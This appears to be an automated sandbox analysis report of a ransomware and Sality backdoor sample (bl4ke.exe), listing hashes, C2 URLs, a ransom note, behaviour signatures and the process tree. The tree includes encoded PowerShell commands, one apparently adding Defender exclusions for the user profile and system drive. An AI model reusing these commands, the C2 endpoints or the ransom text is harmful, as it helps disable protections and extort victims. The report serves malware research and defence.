Resubmissions

  • 28-12-2024 02:53
    241228-ddq9ravnfr 10
  • 28-12-2024 02:51
    241228-dcawdavndm 10

Analysis

  • max time kernel
    68s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    28-12-2024 02:51

General

  • Target

    bl4ke.exe

  • Size

    469KB

  • MD5

    5d9e7031a5d7498bf610633a3d0f6981

  • SHA1

    f11cd03ef06dd53e1cef1ff15693efc919030ac3

  • SHA256

    e056b9ff0256dd40dac919efe92006ee49a3f50d222ab17e755c7dcdbc34a4fc

  • SHA512

    0d846e552d8f2f344257bd6e65e4f3fbfc5d41d90892c9d19af3abe4dc4074a3c73e6802269800fdaaa90a0b0deb78bad40f0c1b75a34a6c840144f316945975

  • SSDEEP

    6144:igQ9ahMwdrlDDX3RtZL7bieYMy4rZEqwpgJCNXFhHcuci:igQsMkrl5t0jINggJMFOuci

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\YOUR_FILES_ARE_FUCKED.HTA

Ransom Note
ALL COMPUTER DATA ENCRYPTED! 00:00:00 TIME AFTER ALL FILES WILL BE DELETED YOUR ID CC50539B88A0A18DB0C83C7C2609D4FD NOW YOU NEED TO PAY TO RECOVER YOUR DATA AFTER MONEY TRANSFER YOU WILL RECIEVE THE DECRYPTOR CONTACTS TELEGRAM @comodosecurity EMAIL [email protected] Any attempts to return your files with the third-party tools can be fatal for your encrypted files! The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files. Finally it will be impossible to decrypt your files! There are several plain steps to restore your files but if you do not follow them we will not be able to help you!

Extracted

Family

sality

C2

http://89.119.67.154/testo5/

http://kukutrustnet777.info/home.gif

http://kukutrustnet888.info/home.gif

http://kukutrustnet987.info/home.gif

http://www.klkjwre9fqwieluoi.info/

http://kukutrustnet777888.info/

Signatures

  • Modifies firewall policy service 3 TTPs 3 IoCs
  • Sality

    Sality is a backdoor written in C++, first discovered in 2003.

  • Sality family
  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 6 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 10 IoCs
  • Windows security modification 2 TTPs 7 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 21 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops autorun.inf file 1 TTPs 2 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
      PID:1060
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
        PID:1140
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
          PID:1184
          • C:\Users\Admin\AppData\Local\Temp\bl4ke.exe
            "C:\Users\Admin\AppData\Local\Temp\bl4ke.exe"
            2⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2024
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG0AZgBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAWQBPAFUAJwAnAFIARQAgAEYAVQBDAEsARQBEACAAQgBZACAAQgBMAEEASwBFACEAIQAhACAATABNAEEATwAgAEwATQBBAE8AIABMAE0AQQBPACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAagB5AHUAIwA+AA=="
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2332
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAbAByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAegBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZwB2ACMAPgA="
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2428
            • C:\Users\Admin\AppData\Local\Temp\gdihell.exe
              "C:\Users\Admin\AppData\Local\Temp\gdihell.exe"
              3⤵
              • Executes dropped EXE
              PID:2688
            • C:\Users\Admin\AppData\Local\Temp\Cronic.exe
              "C:\Users\Admin\AppData\Local\Temp\Cronic.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2664
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 2664 -s 516
                4⤵
                • Loads dropped DLL
                PID:300
            • C:\Users\Admin\AppData\Local\Temp\ApplicationDraw.exe
              "C:\Users\Admin\AppData\Local\Temp\ApplicationDraw.exe"
              3⤵
              • Modifies firewall policy service
              • UAC bypass
              • Windows security bypass
              • Deletes itself
              • Executes dropped EXE
              • Windows security modification
              • Checks whether UAC is enabled
              • Enumerates connected drives
              • Drops autorun.inf file
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              • System policy modification
              PID:2960
            • C:\Users\Admin\AppData\Local\Temp\FUCKSCREEN.exe
              "C:\Users\Admin\AppData\Local\Temp\FUCKSCREEN.exe"
              3⤵
              • Executes dropped EXE
              PID:2676
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\YOUR_FILES_ARE_FUCKED.HTA"
              3⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              PID:2536
            • C:\Users\Admin\AppData\Local\Temp\hslshader.exe
              "C:\Users\Admin\AppData\Local\Temp\hslshader.exe"
              3⤵
              • Executes dropped EXE
              PID:3044
        • C:\Windows\system32\DllHost.exe
          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
          1⤵
            PID:2040
          • C:\Windows\system32\conhost.exe
            \??\C:\Windows\system32\conhost.exe "4513546031089410523-1526343102340787320-243682679-482637516-1203798743-61412519"
            1⤵
              PID:2176
            • C:\Windows\system32\conhost.exe
              \??\C:\Windows\system32\conhost.exe "1700957881-171940515-131059866112753235941184091724-1645576370-1407482095-1583420026"
              1⤵
                PID:2648
              • C:\Windows\system32\conhost.exe
                \??\C:\Windows\system32\conhost.exe "438620695-17626443421697823119-723239277969678317-3511231071123114130-1001284338"
                1⤵
                  PID:2796
                • C:\Windows\system32\conhost.exe
                  \??\C:\Windows\system32\conhost.exe "-2076825105-20514249582044961478-1737135903597568063-1987936759-7674901541236263117"
                  1⤵
                  • Loads dropped DLL
                  PID:2604
                • C:\Windows\system32\conhost.exe
                  \??\C:\Windows\system32\conhost.exe "-1032920669-280101262-70901194-2035275008-1428789747-1661907942959451589-778448842"
                  1⤵
                    PID:2056

Downloads

                  • C:\Users\Admin\AppData\Local\Temp\ApplicationDraw.exe

                    Filesize

                    85KB

                    MD5

                    d2f7ee8114edbcb9aa332c1d8bbb9488

                    SHA1

                    d97e993f1eaf8e4c990f06e9afa4f47efd9a5b06

                    SHA256

                    0cb621f367e9aa5c046760be200dd0b5aa9b6e45c92f28adc73b34b369702f82

                    SHA512

                    268ea70de1dfc4e97e0d057bd625e5080dd139564224d41dc23293b1eaf8205b359e3ab934fcc0b6ae1f0995cb9761ac5a84cdc2a8c40d0afa164eb7c6601243

                  • C:\Users\Admin\AppData\Local\Temp\FUCKSCREEN.exe

                    Filesize

                    11KB

                    MD5

                    c8d6c1b9d0ab8940e827cc7f0f96f4b4

                    SHA1

                    cdc2d69d48748b8836d6e2a4e58a370aebb55288

                    SHA256

                    e9f500615b06fdb6b4eb4cd4e1664ba1da33fe3c2fc1eb0b1e561e06a20f1fbd

                    SHA512

                    86b1e836fb79cf81cf15f7b889d4fcbee9de9f64cca741d012c5fe49fbf1bfc532bbbdb04114672765eff6cecc4ec4dd118fc1d2b52af1595020f09e64665d2a

                  • C:\Users\Admin\AppData\Local\Temp\YOUR_FILES_ARE_FUCKED.HTA

                    Filesize

                    64KB

                    MD5

                    f97a6c9d463f7005d28c273f7f369744

                    SHA1

                    5a594b71f3254fdd8fa1575b7898cd7cb8d0506c

                    SHA256

                    729a7e9dfff763b95cae12e25875cd14acb4c74236d17494e32a72078df9931f

                    SHA512

                    b9a1b151b241977130fa7fd7b3ce183c7836c31cc1c5d82ae5d77d2683bb2771020bc438fb4faa8d24d151234c5adadbd87a58b3be0e9f9ff556d26aaa8c79c7

                  • C:\Users\Admin\AppData\Local\Temp\hslshader.exe

                    Filesize

                    39KB

                    MD5

                    7aa1ce5f332f6bde0ab29720fb768020

                    SHA1

                    0c42cce17644b24b8144f60559dc491b542e957d

                    SHA256

                    6947123f789c83df8c9f3487fb7a2404da6255ee7391aecaede51647205aaadd

                    SHA512

                    42c42203c5ba9319848be6ad716369d55e73a05909d6288eb074ae2ef5330f0d72e48c16d475ae8420445b2b9acd69762b8d8bb2b270beff998bc48e0ba69bc8

                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7S17JRVUIQD6DYJFG907.temp

                    Filesize

                    7KB

                    MD5

                    3efd6f10a5a0df0db510aabdee958261

                    SHA1

                    2e4096aef5551de851ccb8933228184814e0360f

                    SHA256

                    2299f5a198428a1d2a22c2e874b1d4acba4a0ecbb24a7c3a5e1a5b896b656ec8

                    SHA512

                    9babcf1e042840de7238754893bcd92046c95dd18235edfa0f166e6c8669236fbcca022059ee3419e8d507fe3ad69a7790ea03fcedd33288d231e286b2664ffe

                  • C:\oano.exe

                    Filesize

                    100KB

                    MD5

                    9325eb940b5fa9af35df3d2960afddf6

                    SHA1

                    eace2afad56fe3a2855120bd057c5d3ea4f1cac8

                    SHA256

                    c8559f54cc57c7755d6e31aecf4a43c8d655fe77b56d68d1e5a73ee8e9948a26

                    SHA512

                    e469337ea899311e013943f7b0ba0eb879b465d88a819f1c3ebed161b654cea45d01dc8a845045fc77bb3c727f0ec66541f51a7ec0cab6951780ae650ddd094b

                  • \Users\Admin\AppData\Local\Temp\Cronic.exe

                    Filesize

                    14KB

                    MD5

                    726d50c3e3dd789d43664aa5c3c3f9de

                    SHA1

                    f69e053040b09e422a712c4bf31ce20875186e31

                    SHA256

                    8a865d95f2c90c97fe3d762608ebc8040033cac5882e5534675b6b1f056e9c19

                    SHA512

                    872b347a0dd0cdb46959b9b41ad20dfc7dcfaf3cee8a27aa90b33700a44147edf631e03c3bd7ca8867dbcb2b02efc6c05ee0e8dd31062770c39d2ad13a1db56a

                  • \Users\Admin\AppData\Local\Temp\gdihell.exe

                    Filesize

                    38KB

                    MD5

                    65389a4a1a5ec277c42d0dfacd59999b

                    SHA1

                    5098c44ec3a0c1be4d6d8f3dc5ddeeef73848c2c

                    SHA256

                    8476bbe92dd772b4397ecb33fed7286f1b9ef698812b921d0113d5ead4607990

                    SHA512

                    6fef9575d945f761d31406ce528e820945cb6f970eb78dc91c7a7da6e9efe6b2dbb1b55b96911d8115ac98dd95cf1f73a0cec13ad4cbe9750fe33df08e88f8b6
